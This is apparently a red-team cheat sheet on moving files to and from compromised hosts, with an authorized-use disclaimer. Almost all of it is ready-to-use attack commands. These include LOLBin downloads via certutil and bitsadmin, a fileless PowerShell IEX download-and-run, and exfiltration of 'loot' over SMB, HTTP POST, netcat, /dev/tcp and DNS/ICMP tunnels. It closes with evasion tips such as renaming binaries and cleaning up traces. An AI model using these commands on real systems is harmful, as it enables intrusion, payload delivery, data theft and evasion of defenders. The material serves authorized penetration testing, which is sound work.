FILE-TRANSFER-TECHNIQUES
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Getting tools onto, and loot off, a target during an authorized engagement -- Windows and Linux, living-off-the-land where possible.
SERVE FILES FROM YOUR BOX#
python3 -m http.server 80 python3 -m uploadserver 80 # also accepts POST uploads php -S 0.0.0.0:80 ruby -run -e httpd . -p 80 impacket-smbserver share $(pwd) -smb2support # add -user -password for auth impacket-smbserver share $(pwd) -smb2support -user a -password b # SMB3 if host enforces updog -p 80 # http up/download with UI ftp: python3 -m pyftpdlib -p 21 -w nc -lvnp 4444 > out.bin # raw catch
WINDOWS DOWNLOAD (LOLBIN)#
certutil -urlcache -split -f http://IP/f.exe f.exe
bitsadmin /transfer j /download http://IP/f.exe C:\f.exe
powershell iwr http://IP/f.exe -OutFile f.exe # Invoke-WebRequest
powershell (New-Object Net.WebClient).DownloadFile('http://IP/f.exe','f.exe')
powershell IEX(New-Object Net.WebClient).DownloadString('http://IP/s.ps1') # fileless
curl.exe http://IP/f.exe -o f.exe # Win10+ has curl
SMB: copy \\IP\share\f.exe C:\ | net use \\IP\share
WebDAV: copy \\IP@80\share\f.exe . (DavWWWRoot)
WINDOWS UPLOAD / EXFIL#
# SMB back to impacket-smbserver: copy C:\loot.zip \\IP\share\ # certutil to base64 then paste out of a shell: certutil -encode loot.bin loot.b64 & type loot.b64 # PowerShell POST: powershell Invoke-RestMethod -Uri http://IP/ -Method Post -InFile loot.zip # bitsadmin upload: bitsadmin /transfer u /upload http://IP/up C:\loot.zip
LINUX#
wget http://IP/f -O f ; curl http://IP/f -o f scp file user@IP:/path ; scp user@IP:/path file base64 -w0 file ; # paste; decode: base64 -d > file /dev/tcp (no tools): cat < /dev/tcp/IP/4444 > f (pair with nc -lvnp 4444 < f) nc IP 4444 < file ; nc -lvnp 4444 > file rsync -az file user@IP:/path
ENCODING / NO-BINARY TRICKS#
xxd / base64 copy-paste through a text-only shell. ligolo-ng / chisel to tunnel then transfer normally (see PIVOTING-TUNNELING). DNS/ICMP exfil (dnscat2, iodine) when only those egress.
OPSEC#
Prefer HTTPS/known ports; rename binaries; clean up (del, srm); avoid certutil on hardened hosts (heavily signatured). Hash-check transfers (certutil -hashfile, sha256sum).